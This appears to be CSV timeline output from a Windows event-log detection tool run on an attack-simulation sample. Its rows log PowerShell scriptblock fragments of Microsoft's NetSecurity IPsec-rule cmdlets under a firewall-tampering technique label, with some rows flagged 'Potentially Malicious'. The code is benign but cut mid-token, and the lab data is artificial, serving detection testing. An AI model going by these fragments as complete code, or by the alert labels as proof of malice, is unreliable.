[Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$tr",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = 
$true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 
'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' -Alias '*' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, 
ValueFromPipeline=$tr",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ue)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] 
[CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmd",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ue)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 